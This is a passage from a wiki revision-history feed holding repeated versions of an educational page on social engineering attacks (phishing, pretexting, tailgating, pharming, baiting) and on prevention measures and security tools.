This approach is similar to the goal of Pishing but is done quite differently. The task is to lure the vicitm on to a similar looking website e.g. bank, insurance, ... but it is not done with sending you fake links but rather hacking the DNS Server and redirecting you instantly without you even knowing. The domain of the website is completely legit. If the website is done very well your data is being saved and afterwards you are getting redirect onto your real bank account on the real website without you ever knowing. &lt;br /&gt;
&lt;br /&gt;
=== Pretexting ===&lt;br /&gt;
This attack is similar to Phishing but the goal of this attack is to make you believe that you are being contacted by someone close or authoritative. These messages could lead you to send personal information to the attacker. If done right and other conversation were being captured before and the phone number or E-Mail got spoofed you sometimes would not even realize that it is a fake.  &lt;br /&gt;
&lt;br /&gt;
=== Tailgaiting ===&lt;br /&gt;
Tailgaiting is an attack that requires physical access to a secure building. This is achieved by following people through doors or opening you the door by thinking you lost your access card. When done right you get access to a certain level where you could install malware on others PCs. Another ways would be to ask someone for their phone to make a call and then install malware when they are not watching. &lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
[[Ransomware]] is a type of malicious software that encrypts a victim&#039;s personal data and demands a ransom from the victim to restore access to the data. These attacks have been increasing in popularity and are becoming more and more difficult to stop. Some well-known examples of [[Ransomware]] include WannaCry (2017) and Locky (2016). One of the dangers of ransomware is that even if the victim pays the ransom, there is no guarantee that they will actually get their data back.&lt;br /&gt;
&lt;br /&gt;
=== Dumpster Diving ===&lt;br /&gt;
This technique is as the name already tells used to get information out of the trash of others. A letter with sensitive infomation e.g. bank, creditcard or hard drives can contain a lot of data that can be used against you if not disposed properly. A good tip would be throw away pieces of information in different trash cans for example when on the way to work. &lt;br /&gt;
&lt;br /&gt;
=== Pop-Up Window ===&lt;br /&gt;
Pop-Up Windows are often used to scare non enlightened people to get tricked by a simple window mostly in a browser. This scam either wants you to redeem the jackpot you just won or tell you that you computer is infected and you should call the attacker to infect you with malware. Most of the times these windows are hard to close and are pretty loud to intimiated the victim. &lt;br /&gt;
&lt;br /&gt;
=== Baiting/USB Drop ===&lt;br /&gt;
Another bait attack involves the use of dropped USB drives. The attacker will leave a USB drive in a public place, such as a parking lot or lobby, with a label or message that suggests it contains something interesting or valuable. When someone picks up the drive and plugs it into their computer, they may be exposing their system to malware or ransomware.&lt;br /&gt;
&lt;br /&gt;
=== Eavesdropping ===&lt;br /&gt;
Eavesdropping is the act of secretly listening to the private conversations of others without their knowledge. It can be done in a variety of ways, such as through the use of hidden microphones, wiretapping, or simply by listening in on a conversation that is happening nearby. Eavesdropping can be a serious invasion of privacy and is often illegal, particularly if it is done for malicious purposes such as to gather personal or sensitive information. In the digital age, eavesdropping can also be done remotely through the use of malware or other cyber threats that allow an attacker to access and monitor the conversations of their victims.&lt;br /&gt;
&lt;br /&gt;
=== Reverse Social Engineering ===&lt;br /&gt;
One common technique used in reverse social engineering attacks is for the attacker to pretend to be a good guy or authority figure in order to gain the victim&#039;s trust. For example, the attacker might pretend to be a technical support representative and ask the victim for their login credentials in order to &amp;quot;fix&amp;quot; a problem with their computer. Or, the attacker might pose as a law enforcement officer and request that the victim provide sensitive information in order to &amp;quot;assist with an investigation.&amp;quot; In these cases, the victim may feel pressure to comply with the request, believing that they are helping to solve a problem or protect against a threat.&lt;br /&gt;
&lt;br /&gt;
=== Impersonating ===&lt;br /&gt;
Impersonating is the act of pretending to be someone else, either in person or online, in order to deceive others. This can be done for a variety of reasons, such as to gain access to sensitive information or resources, to evade detection or consequences, or to commit a crime. In the digital world, impersonation is often done through the use of fake profiles or websites that mimic legitimate ones in order to trick people into divulging personal information or money. In person, impersonation can be more complex and may involve the use of props, costumes, and other means of disguising one&#039;s true identity.&lt;br /&gt;
&lt;br /&gt;
== Prevention ==&lt;br /&gt;
As attacks increase and improve it is very hard to defend against those if you do not know how they work and what they do. To prevent or mitigate such attacks you need 3 important informations.&lt;br /&gt;
&lt;br /&gt;
=== Clarify Attacks ===&lt;br /&gt;
The first part help you to understand how and what these attacks are trying to do. If you know what a Pop-Up Window is and you now know that these messages are spam and trying to lure you into a trap you will not fall for it anymore. The best way is know examples of the most common attacks to obtainer awareness againts those social engineering attacks. Since these attacks improve over time you should be up-to-date and you should ask people you trust for help if you do not know how to proceed. &lt;br /&gt;
&lt;br /&gt;
=== Education and Training ===&lt;br /&gt;
To ensure the safety and security of your employees, it is important to provide regular training sessions to keep them informed on best practices and current threats. They should be cautious when receiving phone calls or emails from unknown sources, and verify the identity of the sender before disclosing any confidential information. They should also be wary of suspicious links or attachments, and avoid downloading unknown files. To further protect against potential threats, it is advisable to implement multifactor authentication and regularly update antivirus and antimalware programs. Additionally, it is important to carefully examine the references of any offers or requests for sensitive data.&lt;br /&gt;
&lt;br /&gt;
=== Set Security Standards ===&lt;br /&gt;
You should start setting yourself a certain security standard. This goes from checking certain programs or files you do not know to check links before you click them. If you have a new contact in your mailbox you should double check the sender to know for you sure you are not dealing with a scam artist. You should also never share you PC with other or plug-in strange devices you do not know. An increased awareness about pishing emails from providers would be appreciative to check bills if they are not infected with malware. &lt;br /&gt;
&lt;br /&gt;
=== Implement Security Tools ===&lt;br /&gt;
Since detecting malware is getting more difficult everytime you should start using certain tools to help you secure you environment. To protect against more advanced attacks, it is recommended that companies use Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS), which can detect and respond to attacks in real-time. In addition to a firewall, companies can also use Virtual Private Networks (VPNs) to secure their internet connection. Anti-phishing tools can help to block and blacklist phishing websites, and companies can also consider using honeypot emails as a way to lure and track attackers. It is also important to implement physical security measures, such as properly securing hardware and following guidelines for physical access to facilities. These tools will help you to detect unwanted programs and helps you safeing your data externally. &lt;br /&gt;
&lt;br /&gt;
* Anti Virus Software: [https://www.malwarebytes.com/ Malwarebytes]&lt;br /&gt;
* Browser Anti-Ad/Spam Plugin: [https://ublockorigin.com/ uBlock Origin]&lt;br /&gt;
* Check E-Mail periodically: [https://haveibeenpwned.com/ HaveIBeenPwned]&lt;br /&gt;
* Safe File externally: [https://nextcloud.com/ Nextcloud]&lt;br /&gt;
* Check Programs: [https://www.virustotal.com/ Virustotal]&lt;br /&gt;
* Password Manager: [https://keepassxc.org/ KeepassXC]&lt;br /&gt;
&lt;br /&gt;
== Social Media Intelligence ==&lt;br /&gt;
&lt;br /&gt;
Social media intelligence (SOCMINT) is a process that involves gathering and analyzing data from social media platforms in order to inform business decisions. This type of intelligence can be used to track brand mentions and sentiment, monitor competitors, and identify emerging trends or opportunities for engagement.&lt;br /&gt;
&lt;br /&gt;
By collecting and analyzing social media data, companies can gain valuable insights into the perceptions and behaviors of their customers and target audience. This can inform marketing strategies, customer service efforts, and product development. For example, a company might use social media intelligence to identify common customer pain points and develop solutions to address them, or to identify influencers to partner with in order to promote their brand.&lt;br /&gt;
&lt;br /&gt;
There are a number of tools and platforms available to help companies automate the process of gathering and analyzing social media data. These tools often include features such as keyword tracking, sentiment analysis, and competitor analysis.&lt;br /&gt;
&lt;br /&gt;
Overall, social media intelligence can be an important part of a company&#039;s market research and customer insights efforts, helping them to better understand and connect with their audience on social media. It can also be a useful way for companies to stay up-to-date on industry developments and emerging trends, and to identify opportunities for growth and innovation.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.sciencedirect.com/science/article/abs/pii/S2214212614001343?via%3Dihub&lt;br /&gt;
* https://link.springer.com/chapter/10.1007/978-3-642-22424-9_4&lt;br /&gt;
* https://www.mdpi.com/1999-5903/11/4/89&lt;br /&gt;
* https://www.researchgate.net/profile/Hugo-Barbosa/publication/315351300_SOCIAL_ENGINEERING_AND_CYBER_SECURITY/links/599c43430f7e9b892bafc0df/SOCIAL-ENGINEERING-AND-CYBER-SECURITY.pdf&lt;br /&gt;
* https://cybernews.com/cyber-war/influencing-anonymous-experiment/&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14545</id>
		<title>Social Engineering</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14545"/>
		<updated>2024-03-04T18:41:13Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
This documentation contains information of what Social Engineering is, how it is getting used and how to prevent or mitigate some of those attacks. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
In order to execute a social engineering attack you need to understand the basis of social engineering described below. There are also tools to understand and execute these attacks on a practical level. There are many pre-defined attacks which show how easy it is to perform such attacks. You can read more about that in [[Social Engineering Toolkit]]&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
Social engineering is a technique that involves using human interaction to gather information or influence a person to act in a certain way. It can involve spying on someone&#039;s personal life in order to achieve a specific goal, such as manipulating elections, obtaining information, or stealing money. The goal of social engineering is to guide a person towards a particular outcome, often by manipulating their thoughts or actions.&lt;br /&gt;
&lt;br /&gt;
=== Phases ===&lt;br /&gt;
In Social Engineering there are a few necessary steps to complete an attack and gain the information you are after. Kevin Mitnick has divided the process into 4 steps with are mainly: &#039;&#039;&#039;Information Gathering&#039;&#039;&#039;, &#039;&#039;&#039;Hook Relationship&#039;&#039;&#039;, &#039;&#039;&#039;Exploitation and Execution&#039;&#039;&#039; and &#039;&#039;&#039;End without leaving a trace&#039;&#039;&#039;. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:01_mitnicks_attack_circle.png|thumb|none|300px|Source: Mouton, Social&lt;br /&gt;
engineering attack framework]]&lt;br /&gt;
&lt;br /&gt;
==== Information Gathering ====&lt;br /&gt;
Information gathering involves collecting as much information as possible about a potential victim in order to identify possible attack vectors. This may include identifying personal details, interests, or vulnerabilities that can be exploited. This information can be gathered through various means, such as social media, public records, or by directly interacting with the victim.&lt;br /&gt;
&lt;br /&gt;
==== Hook Relationship ====&lt;br /&gt;
In order to build a &amp;quot;hook relationship&amp;quot; with the victim, the attacker will often try to present themselves as trustworthy in order to gain the victim&#039;s confidence and cooperation. This may involve pretending to be someone the victim knows, such as a colleague or friend, or posing as an authority figure in order to gain the victim&#039;s trust.&lt;br /&gt;
&lt;br /&gt;
==== Exploitation and Execution ====&lt;br /&gt;
The exploitation and execution phase involves manipulating the victim in order to persuade them to take certain actions or disclose information that the attacker is seeking. This may involve using psychological manipulation or other tactics to influence the victim&#039;s behavior. The attacker may use a variety of tactics, such as flattery, fear, or pressure, in order to persuade the victim to comply with their requests.&lt;br /&gt;
&lt;br /&gt;
==== End without leaving a trace ====&lt;br /&gt;
Once the attacker has achieved their goal, they will often try to cover their tracks and end the attack without leaving any evidence behind. This may involve deleting any records of the attack or disguising their involvement in order to avoid detection. In order to avoid being caught, the attacker may also take steps to destroy any evidence of the attack, such as wiping clean any devices or servers that were used in the attack.&lt;br /&gt;
&lt;br /&gt;
== Attacks ==&lt;br /&gt;
This part contains the most common and basic attacks used today. Nearly everyone should have seen such an attack in practice, either by e.g. receiving a pishing email or getting a warning that pishing emails are circulating with an example. If you have not, just check you Spam or Junk folder in you mailbox you will probably find one in there. &lt;br /&gt;
&lt;br /&gt;
=== Phishing ===&lt;br /&gt;
Phishing Attacks are one of the most common attacks. They are pretty simple and based on for example a real E-Mail that is being copied and used to get user data with links redirecting to a wrong website. This website looks than pretty similar to the original and if you do not look close enough you sometimes do not even realize that it is fake. The goal of this attack is in general to steal password from accounts and then try to steal money in any way possible. There are different types of phishing:&lt;br /&gt;
* Spear phishing: Are attacks on specific people or groups, for this you need to know about the person/company beforehand. Since it is very personal, it is also often very successful in contrast to other Social Engineering approaches. &lt;br /&gt;
* Whaling: Similar to spear-phishing, except that high-profile individuals are targeted.&lt;br /&gt;
* Vishing: These phishing attacks are carried out over the phone.&lt;br /&gt;
* Smishing: The attacks are carried out over text messages.&lt;br /&gt;
* Interactive voice-response phishing: Interactive voice response system is used. &lt;br /&gt;
* Business email compromise phishing: : It is similar to whaling, the attacker wants access to business mails and then sends legitimate looking business mails to get ”normal” employees to click some link or something.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Pretexting ===&lt;br /&gt;
This attack is similar to Phishing but the goal of this attack is to make you believe that you are being contacted by someone close or authoritative. These messages could lead you to send personal information to the attacker. If done right and other conversation were being caputred before and the phone number or E-Mail got spoofed you sometimes would not even realize that it is a fake.  &lt;br /&gt;
&lt;br /&gt;
=== Tailgaiting ===&lt;br /&gt;
Tailgaiting is an attack that requires physical access to a secure building. This is achieved by following people through doors or opening you the door by thinking you lost your access card. When done right you get access to a certain level where you could install malware on others PCs. Another ways would be to ask someone for their phone to make a call and then install malware when they are not watching. &lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
[[Ransomware]] is a type of malicious software that encrypts a victim&#039;s personal data and demands a ransom from the victim to restore access to the data. These attacks have been increasing in popularity and are becoming more and more difficult to stop. Some well-known examples of [[Ransomware]] include WannaCry (2017) and Locky (2016). One of the dangers of ransomware is that even if the victim pays the ransom, there is no guarantee that they will actually get their data back.&lt;br /&gt;
&lt;br /&gt;
=== Dumpster Diving ===&lt;br /&gt;
This technique is as the name already tells used to get information out of the trash of others. A letter with sensitive infomation e.g. bank, creditcard or hard drives can contain a lot of data that can be used against you if not disposed properly. A good tip would be throw away pieces of information in different trash cans for example when on the way to work. &lt;br /&gt;
&lt;br /&gt;
=== Pop-Up Window ===&lt;br /&gt;
Pop-Up Windows are often used to scare non enlightened people to get tricked by a simple window mostly in a browser. This scam either wants you to redeem the jackpot you just won or tell you that you computer is infected and you should call the attacker to infect you with malware. Most of the times these windows are hard to close and are pretty loud to intimiated the victim. &lt;br /&gt;
&lt;br /&gt;
=== Pharming ===&lt;br /&gt;
This approach is similar to the goal of Pishing but is done quite differently. The task is to lure the vicitm on to a similar looking website e.g. bank, insurance, ... but it is not done with sending you fake links but rather hacking the DNS Server and redirecting you instantly without you even knowing. If the website is done very well your data is being apprehend and afterwards you are getting redirect onto your real bank account without you ever knowing. &lt;br /&gt;
&lt;br /&gt;
=== Baiting/USB Drop ===&lt;br /&gt;
Another bait attack involves the use of dropped USB drives. The attacker will leave a USB drive in a public place, such as a parking lot or lobby, with a label or message that suggests it contains something interesting or valuable. When someone picks up the drive and plugs it into their computer, they may be exposing their system to malware or ransomware.&lt;br /&gt;
&lt;br /&gt;
=== Eavesdropping ===&lt;br /&gt;
Eavesdropping is the act of secretly listening to the private conversations of others without their knowledge. It can be done in a variety of ways, such as through the use of hidden microphones, wiretapping, or simply by listening in on a conversation that is happening nearby. Eavesdropping can be a serious invasion of privacy and is often illegal, particularly if it is done for malicious purposes such as to gather personal or sensitive information. In the digital age, eavesdropping can also be done remotely through the use of malware or other cyber threats that allow an attacker to access and monitor the conversations of their victims.&lt;br /&gt;
&lt;br /&gt;
=== Reverse Social Engineering ===&lt;br /&gt;
One common technique used in reverse social engineering attacks is for the attacker to pretend to be a good guy or authority figure in order to gain the victim&#039;s trust. For example, the attacker might pretend to be a technical support representative and ask the victim for their login credentials in order to &amp;quot;fix&amp;quot; a problem with their computer. Or, the attacker might pose as a law enforcement officer and request that the victim provide sensitive information in order to &amp;quot;assist with an investigation.&amp;quot; In these cases, the victim may feel pressure to comply with the request, believing that they are helping to solve a problem or protect against a threat.&lt;br /&gt;
&lt;br /&gt;
=== Impersonating ===&lt;br /&gt;
Impersonating is the act of pretending to be someone else, either in person or online, in order to deceive others. This can be done for a variety of reasons, such as to gain access to sensitive information or resources, to evade detection or consequences, or to commit a crime. In the digital world, impersonation is often done through the use of fake profiles or websites that mimic legitimate ones in order to trick people into divulging personal information or money. In person, impersonation can be more complex and may involve the use of props, costumes, and other means of disguising one&#039;s true identity.&lt;br /&gt;
&lt;br /&gt;
== Prevention ==&lt;br /&gt;
As attacks increase and improve it is very hard to defend against those if you do not know how they work and what they do. To prevent or mitigate such attacks you need 3 important informations.&lt;br /&gt;
&lt;br /&gt;
=== Clarify Attacks ===&lt;br /&gt;
The first part help you to understand how and what these attacks are trying to do. If you know what a Pop-Up Window is and you now know that these messages are spam and trying to lure you into a trap you will not fall for it anymore. The best way is know examples of the most common attacks to obtainer awareness againts those social engineering attacks. Since these attacks improve over time you should be up-to-date and you should ask people you trust for help if you do not know how to proceed. &lt;br /&gt;
&lt;br /&gt;
=== Education and Training ===&lt;br /&gt;
To ensure the safety and security of your employees, it is important to provide regular training sessions to keep them informed on best practices and current threats. They should be cautious when receiving phone calls or emails from unknown sources, and verify the identity of the sender before disclosing any confidential information. They should also be wary of suspicious links or attachments, and avoid downloading unknown files. To further protect against potential threats, it is advisable to implement multifactor authentication and regularly update antivirus and antimalware programs. Additionally, it is important to carefully examine the references of any offers or requests for sensitive data.&lt;br /&gt;
&lt;br /&gt;
=== Set Security Standards ===&lt;br /&gt;
You should start setting yourself a certain security standard. This goes from checking certain programs or files you do not know to check links before you click them. If you have a new contact in your mailbox you should double check the sender to know for you sure you are not dealing with a scam artist. You should also never share you PC with other or plug-in strange devices you do not know. An increased awareness about pishing emails from providers would be appreciative to check bills if they are not infected with malware. &lt;br /&gt;
&lt;br /&gt;
=== Implement Security Tools ===&lt;br /&gt;
Since detecting malware is getting more difficult everytime you should start using certain tools to help you secure you environment. To protect against more advanced attacks, it is recommended that companies use Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS), which can detect and respond to attacks in real-time. In addition to a firewall, companies can also use Virtual Private Networks (VPNs) to secure their internet connection. Anti-phishing tools can help to block and blacklist phishing websites, and companies can also consider using honeypot emails as a way to lure and track attackers. It is also important to implement physical security measures, such as properly securing hardware and following guidelines for physical access to facilities. These tools will help you to detect unwanted programs and helps you safeing your data externally. &lt;br /&gt;
&lt;br /&gt;
* Anti Virus Software: [https://www.malwarebytes.com/ Malwarebytes]&lt;br /&gt;
* Browser Anti-Ad/Spam Plugin: [https://ublockorigin.com/ uBlock Origin]&lt;br /&gt;
* Check E-Mail periodically: [https://haveibeenpwned.com/ HaveIBeenPwned]&lt;br /&gt;
* Safe File externally: [https://nextcloud.com/ Nextcloud]&lt;br /&gt;
* Check Programs: [https://www.virustotal.com/ Virustotal]&lt;br /&gt;
* Password Manager: [https://keepassxc.org/ KeepassXC]&lt;br /&gt;
&lt;br /&gt;
== Social Media Intelligence ==&lt;br /&gt;
&lt;br /&gt;
Social media intelligence (SOCMINT) is a process that involves gathering and analyzing data from social media platforms in order to inform business decisions. This type of intelligence can be used to track brand mentions and sentiment, monitor competitors, and identify emerging trends or opportunities for engagement.&lt;br /&gt;
&lt;br /&gt;
By collecting and analyzing social media data, companies can gain valuable insights into the perceptions and behaviors of their customers and target audience. This can inform marketing strategies, customer service efforts, and product development. For example, a company might use social media intelligence to identify common customer pain points and develop solutions to address them, or to identify influencers to partner with in order to promote their brand.&lt;br /&gt;
&lt;br /&gt;
There are a number of tools and platforms available to help companies automate the process of gathering and analyzing social media data. These tools often include features such as keyword tracking, sentiment analysis, and competitor analysis.&lt;br /&gt;
&lt;br /&gt;
Overall, social media intelligence can be an important part of a company&#039;s market research and customer insights efforts, helping them to better understand and connect with their audience on social media. It can also be a useful way for companies to stay up-to-date on industry developments and emerging trends, and to identify opportunities for growth and innovation.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.sciencedirect.com/science/article/abs/pii/S2214212614001343?via%3Dihub&lt;br /&gt;
* https://link.springer.com/chapter/10.1007/978-3-642-22424-9_4&lt;br /&gt;
* https://www.mdpi.com/1999-5903/11/4/89&lt;br /&gt;
* https://www.researchgate.net/profile/Hugo-Barbosa/publication/315351300_SOCIAL_ENGINEERING_AND_CYBER_SECURITY/links/599c43430f7e9b892bafc0df/SOCIAL-ENGINEERING-AND-CYBER-SECURITY.pdf&lt;br /&gt;
* https://cybernews.com/cyber-war/influencing-anonymous-experiment/&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14542</id>
		<title>Social Engineering</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14542"/>
		<updated>2024-03-04T18:29:18Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: typo&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
This documentation contains information of what Social Engineering is, how it is getting used and how to prevent or mitigate some of those attacks. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
In order to execute a social engineering attack you need to understand the basis of social engineering described below. There are also tools to understand and execute these attacks on a practical level. There are many pre-defined attacks which show how easy it is to perform such attacks. You can read more about that in [[Social Engineering Toolkit]]&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
Social engineering is a technique that involves using human interaction to gather information or influence a person to act in a certain way. It can involve spying on someone&#039;s personal life in order to achieve a specific goal, such as manipulating elections, obtaining information, or stealing money. The goal of social engineering is to guide a person towards a particular outcome, often by manipulating their thoughts or actions.&lt;br /&gt;
&lt;br /&gt;
=== Phases ===&lt;br /&gt;
In Social Engineering there are a few necessary steps to complete an attack and gain the information you are after. Kevin Mitnick has divided the process into 4 steps with are mainly: &#039;&#039;&#039;Information Gathering&#039;&#039;&#039;, &#039;&#039;&#039;Hook Relationship&#039;&#039;&#039;, &#039;&#039;&#039;Exploitation and Execution&#039;&#039;&#039; and &#039;&#039;&#039;End without leaving a trace&#039;&#039;&#039;. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:01_mitnicks_attack_circle.png|thumb|none|300px|Source: Mouton, Social&lt;br /&gt;
engineering attack framework]]&lt;br /&gt;
&lt;br /&gt;
==== Information Gathering ====&lt;br /&gt;
Information gathering involves collecting as much information as possible about a potential victim in order to identify possible attack vectors. This may include identifying personal details, interests, or vulnerabilities that can be exploited. This information can be gathered through various means, such as social media, public records, or by directly interacting with the victim.&lt;br /&gt;
&lt;br /&gt;
==== Hook Relationship ====&lt;br /&gt;
In order to build a &amp;quot;hook relationship&amp;quot; with the victim, the attacker will often try to present themselves as trustworthy in order to gain the victim&#039;s confidence and cooperation. This may involve pretending to be someone the victim knows, such as a colleague or friend, or posing as an authority figure in order to gain the victim&#039;s trust.&lt;br /&gt;
&lt;br /&gt;
==== Exploitation and Execution ====&lt;br /&gt;
The exploitation and execution phase involves manipulating the victim in order to persuade them to take certain actions or disclose information that the attacker is seeking. This may involve using psychological manipulation or other tactics to influence the victim&#039;s behavior. The attacker may use a variety of tactics, such as flattery, fear, or pressure, in order to persuade the victim to comply with their requests.&lt;br /&gt;
&lt;br /&gt;
==== End without leaving a trace ====&lt;br /&gt;
Once the attacker has achieved their goal, they will often try to cover their tracks and end the attack without leaving any evidence behind. This may involve deleting any records of the attack or disguising their involvement in order to avoid detection. In order to avoid being caught, the attacker may also take steps to destroy any evidence of the attack, such as wiping clean any devices or servers that were used in the attack.&lt;br /&gt;
&lt;br /&gt;
== Attacks ==&lt;br /&gt;
This part contains the most common and basic attacks used today. Nearly everyone should have seen such an attack in practice, either by e.g. receiving a pishing email or getting a warning that pishing emails are circulating with an example. If you have not, just check you Spam or Junk folder in you mailbox you will probably find one in there. &lt;br /&gt;
&lt;br /&gt;
=== Phishing ===&lt;br /&gt;
Phishing Attacks are one of the most common attacks. They are pretty simple and based on for example a real E-Mail that is being copied and used to get user data with links redirecting to a wrong website. This website looks than pretty similar to the original and if you do not look close enough you sometimes do not even realize that it is fake. The goal of this attack is in general to steal password from accounts and then try to steal money in any way possible. There are different types of phishing:&lt;br /&gt;
* Spear phishing: Are attacks on specific people or groups, for this you need to know about the person/company beforehand. Since it is very personal, it is also often very successful in contrast to other Social Engineering approaches. &lt;br /&gt;
* Whaling: Similar to spear-phishing, except that high-profile individuals are targeted.&lt;br /&gt;
* Vishing:These phishing attacks are carried out over the phone.&lt;br /&gt;
* Smishing: The attacks are carried out over text messages.&lt;br /&gt;
* Interactive voice-response phishing: Interactive voice response system is used. &lt;br /&gt;
* Business email compromise phishing: : It is similar to whaling, the attacker wants access to business mails and then sends legitimate looking business mails to get ”normal” employees to click some link or something.&lt;br /&gt;
&lt;br /&gt;
=== Pretexting ===&lt;br /&gt;
This attack is similar to Phishing but the goal of this attack is to make you believe that you are being contacted by someone close or authoritative. These messages could lead you to send personal information to the attacker. If done right and other conversation were being caputred before and the phone number or E-Mail got spoofed you sometimes would not even realize that it is a fake.  &lt;br /&gt;
&lt;br /&gt;
=== Tailgaiting ===&lt;br /&gt;
Tailgaiting is an attack that requires physical access to a secure building. This is achieved by following people through doors or opening you the door by thinking you lost your access card. When done right you get access to a certain level where you could install malware on others PCs. Another ways would be to ask someone for their phone to make a call and then install malware when they are not watching. &lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
[[Ransomware]] is a type of malicious software that encrypts a victim&#039;s personal data and demands a ransom from the victim to restore access to the data. These attacks have been increasing in popularity and are becoming more and more difficult to stop. Some well-known examples of [[Ransomware]] include WannaCry (2017) and Locky (2016). One of the dangers of ransomware is that even if the victim pays the ransom, there is no guarantee that they will actually get their data back.&lt;br /&gt;
&lt;br /&gt;
=== Dumpster Diving ===&lt;br /&gt;
This technique is as the name already tells used to get information out of the trash of others. A letter with sensitive infomation e.g. bank, creditcard or hard drives can contain a lot of data that can be used against you if not disposed properly. A good tip would be throw away pieces of information in different trash cans for example when on the way to work. &lt;br /&gt;
&lt;br /&gt;
=== Pop-Up Window ===&lt;br /&gt;
Pop-Up Windows are often used to scare non enlightened people to get tricked by a simple window mostly in a browser. This scam either wants you to redeem the jackpot you just won or tell you that you computer is infected and you should call the attacker to infect you with malware. Most of the times these windows are hard to close and are pretty loud to intimiated the victim. &lt;br /&gt;
&lt;br /&gt;
=== Pharming ===&lt;br /&gt;
This approach is similar to the goal of Pishing but is done quite differently. The task is to lure the vicitm on to a similar looking website e.g. bank, insurance, ... but it is not done with sending you fake links but rather hacking the DNS Server and redirecting you instantly without you even knowing. If the website is done very well your data is being apprehend and afterwards you are getting redirect onto your real bank account without you ever knowing. &lt;br /&gt;
&lt;br /&gt;
=== Baiting/USB Drop ===&lt;br /&gt;
Another bait attack involves the use of dropped USB drives. The attacker will leave a USB drive in a public place, such as a parking lot or lobby, with a label or message that suggests it contains something interesting or valuable. When someone picks up the drive and plugs it into their computer, they may be exposing their system to malware or ransomware.&lt;br /&gt;
&lt;br /&gt;
=== Eavesdropping ===&lt;br /&gt;
Eavesdropping is the act of secretly listening to the private conversations of others without their knowledge. It can be done in a variety of ways, such as through the use of hidden microphones, wiretapping, or simply by listening in on a conversation that is happening nearby. Eavesdropping can be a serious invasion of privacy and is often illegal, particularly if it is done for malicious purposes such as to gather personal or sensitive information. In the digital age, eavesdropping can also be done remotely through the use of malware or other cyber threats that allow an attacker to access and monitor the conversations of their victims.&lt;br /&gt;
&lt;br /&gt;
=== Reverse Social Engineering ===&lt;br /&gt;
One common technique used in reverse social engineering attacks is for the attacker to pretend to be a good guy or authority figure in order to gain the victim&#039;s trust. For example, the attacker might pretend to be a technical support representative and ask the victim for their login credentials in order to &amp;quot;fix&amp;quot; a problem with their computer. Or, the attacker might pose as a law enforcement officer and request that the victim provide sensitive information in order to &amp;quot;assist with an investigation.&amp;quot; In these cases, the victim may feel pressure to comply with the request, believing that they are helping to solve a problem or protect against a threat.&lt;br /&gt;
&lt;br /&gt;
=== Impersonating ===&lt;br /&gt;
Impersonating is the act of pretending to be someone else, either in person or online, in order to deceive others. This can be done for a variety of reasons, such as to gain access to sensitive information or resources, to evade detection or consequences, or to commit a crime. In the digital world, impersonation is often done through the use of fake profiles or websites that mimic legitimate ones in order to trick people into divulging personal information or money. In person, impersonation can be more complex and may involve the use of props, costumes, and other means of disguising one&#039;s true identity.&lt;br /&gt;
&lt;br /&gt;
== Prevention ==&lt;br /&gt;
As attacks increase and improve it is very hard to defend against those if you do not know how they work and what they do. To prevent or mitigate such attacks you need 3 important informations.&lt;br /&gt;
&lt;br /&gt;
=== Clarify Attacks ===&lt;br /&gt;
The first part help you to understand how and what these attacks are trying to do. If you know what a Pop-Up Window is and you now know that these messages are spam and trying to lure you into a trap you will not fall for it anymore. The best way is know examples of the most common attacks to obtainer awareness againts those social engineering attacks. Since these attacks improve over time you should be up-to-date and you should ask people you trust for help if you do not know how to proceed. &lt;br /&gt;
&lt;br /&gt;
=== Education and Training ===&lt;br /&gt;
To ensure the safety and security of your employees, it is important to provide regular training sessions to keep them informed on best practices and current threats. They should be cautious when receiving phone calls or emails from unknown sources, and verify the identity of the sender before disclosing any confidential information. They should also be wary of suspicious links or attachments, and avoid downloading unknown files. To further protect against potential threats, it is advisable to implement multifactor authentication and regularly update antivirus and antimalware programs. Additionally, it is important to carefully examine the references of any offers or requests for sensitive data.&lt;br /&gt;
&lt;br /&gt;
=== Set Security Standards ===&lt;br /&gt;
You should start setting yourself a certain security standard. This goes from checking certain programs or files you do not know to check links before you click them. If you have a new contact in your mailbox you should double check the sender to know for you sure you are not dealing with a scam artist. You should also never share you PC with other or plug-in strange devices you do not know. An increased awareness about pishing emails from providers would be appreciative to check bills if they are not infected with malware. &lt;br /&gt;
&lt;br /&gt;
=== Implement Security Tools ===&lt;br /&gt;
